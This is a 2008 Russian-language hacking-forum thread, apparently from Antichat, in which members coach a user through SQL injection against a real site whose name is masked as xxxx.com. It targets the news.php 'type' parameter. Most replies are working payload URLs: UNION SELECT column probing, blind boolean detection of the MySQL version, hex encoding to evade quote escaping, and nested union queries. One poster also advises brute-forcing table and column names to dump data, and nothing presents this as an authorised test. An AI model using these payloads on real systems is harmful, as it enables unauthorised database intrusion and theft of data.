04.11.2008, 17:06
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
|
|
|
04.11.2008, 17:16
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Сообщение от geforse
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
Сообщение от jokester
А что по твоему он должен выводить?
Версию)
Сообщение от jokester
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
Вот так попробуй
Выводит новость с id 16
Сообщение от iddqd
попробуй склеить union select с:
type=17'
type=-1
type=-1'
type=9999
Никаких ошибок нет(
|
|
|
|
04.11.2008, 17:49
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Зачем тебе ошибки? Ты принтабельные поля ищи. source страницы покопай.
+union+select+111,222,333,444/* для удобства, и ищи.
|
|
|
|
04.11.2008, 18:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
http://www.xxxx.com/news.php?type=16+and+1=2+union+select+1,version(), 3,4/*
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4+limi t+1,1/*
|
|
|
|
04.11.2008, 18:37
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/*
так ты никогда не увидишь версию, надо ставить несуществующию запись
Если
http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/*
не помогает, попробуй так
http://www.xxxx.com/news.php?type=-16'+union+select+1,2,3,4/*
если и так не катит скидывай ссылку сюда или в пм
|
|
|
|
04.11.2008, 19:13
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Та бывает такое, что нет ниодного поля с выводом на экран.
попробуй вот так:
PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=51
это будет значить, что mysql 3 версии
PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=52
это будет значить, что mysql 4 версии
PHP код:
http://www.xxxx.com/news.php?type=16+and+ascii(lower(substring(version(),1,1)))=53
это будет значить, что mysql 5 версии
В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии... |
|
|
|
04.11.2008, 20:09
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Версия MySQL 5
|
|
|
|
04.11.2008, 20:12
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Если принтабельных полей нет-юзай подзапросы. Иначе никак.
|
|
|
|
04.11.2008, 20:35
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Попробуй ещё так
http://www.xxxx.com/news.php?type=16+union+select+'-16+union+select+1,2,3,4'+limit+1,1/*
Или перегони в хекс, если кавычки экранируются\слэшируются.В ообще подобная двойная конструкция, внутри union select может сработать. Пробуй.
|
|
|
|
04.11.2008, 20:48
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
В одном из этих случаев не должно вылезти ошибки, если ее нету, то запрос к mysql true и можно сделать вывод о версии...
И не только вывод версии ... тем более если версия 5 можно сбрутить все необходимые таблицы и колонки .... а затем полноценный вывод из нужной нам таблицы...
то же самое и в версии 4ре .. только нам нужно перебрать стандартные значения табиц и колонок ...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?926459){kind=avatar}
Похожие темы
Комбинированный вид
